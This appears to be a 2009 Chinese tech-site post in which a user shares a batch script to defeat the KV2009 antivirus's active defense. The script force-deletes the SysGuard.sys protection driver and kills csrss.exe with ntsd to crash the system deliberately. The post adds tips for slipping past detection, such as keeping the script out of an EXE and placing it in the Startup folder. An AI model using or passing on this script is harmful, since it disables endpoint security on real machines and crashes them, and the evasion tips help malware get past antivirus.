批处理战KV2009主动防御(无相关经验者慎用)

安全 黑客攻防
这是一个网友对KV2009系列的测试,可能会对系统造成一些影响。所以,51CTO编辑在这里提醒您,在测试前先确定你将要做什么。

很XX,高手飘过...

今早起来一边早饭一边试验的。代码见下:

@echo off
del %systemroot%\system32\drivers\SysGuard.sys /f /q /s
set app_name=csrss.exe
echo 查找进程%app_name%,准备死机...
(tasklist /nh | findstr /i %app_name%) || (goto dead)
:dead
ntsd -c -q -pn %app_name%

原理我自己也不是太明白就不多说了,实验结果好像管用,我用虚拟机和真实机都分别试验了下,还不错。直接点的批处理脚本,如果转成EXE效果不保证了(没有实验)。但是由于有关机回写,必须强迫死机,虽然重启后KV的变态进程守护不管用了(可以用任务管理器试试),但是在重启之前你还得把善后工作做好,准备来日重生。有几点得注意:

1、不能直接用批处理写注册表(虽然可以还原SSDT之后用API写,但是不是我们追求的纯粹R3手段)
2、最好不要把bat放在EXE里,因为运行时KV十有八九可以拦截到
3、最好的地方可能是启动文件夹,或许还有些其他修改手段

的确是个很娱乐且没有什么实用价值的手段...大家可以娱乐下,不过考虑到每个人的机子效果或许不同,不用报有太大希望。

特别强调:KV08/09用户,试验时一定要把C:\Windows\system32\drivers\SysGuard.sys拷贝个到其它地方备份,如果本实验真的成功了,KV就实效了。只有拷贝回去下次重启即可恢复,或者重新安装。

【编辑推荐】

  1. 《X战警前传》提前泄露 FBI怒抄0day组织大本营
  2. 彻底无处可逃:研究人员展示BIOS级底层安全攻击
  3. 美女黑客曝英特尔CPU漏洞或引发全球用户恐慌
  4. 安全专家详谈:对付恶意软件的策略及方法
  5. 51CTO记者亲历:尤金.卡巴斯基开启2009中国安全行
责任编辑:王文文 来源: Left的XX实验室
相关推荐

2009-04-21 13:02:02

2009-07-27 19:40:18

2009-04-21 14:43:31

2013-04-02 10:27:31

2010-11-02 20:13:36

2014-12-29 11:13:48

2015-12-02 10:33:40

2009-12-25 15:58:37

WPF数据处理

2011-06-30 14:04:03

2019-09-06 15:16:59

2011-06-08 17:29:20

2017-09-15 16:12:42

2009-10-13 16:37:29

2023-11-10 09:54:32

2010-01-27 10:16:04

2010-09-01 15:44:02

2009-02-27 16:06:24

2009-06-10 11:23:15

杀毒体验卡免费江民

2009-10-26 10:00:08

2019-12-04 08:44:38

网络安全物联网大数据
点赞
收藏

51CTO技术栈公众号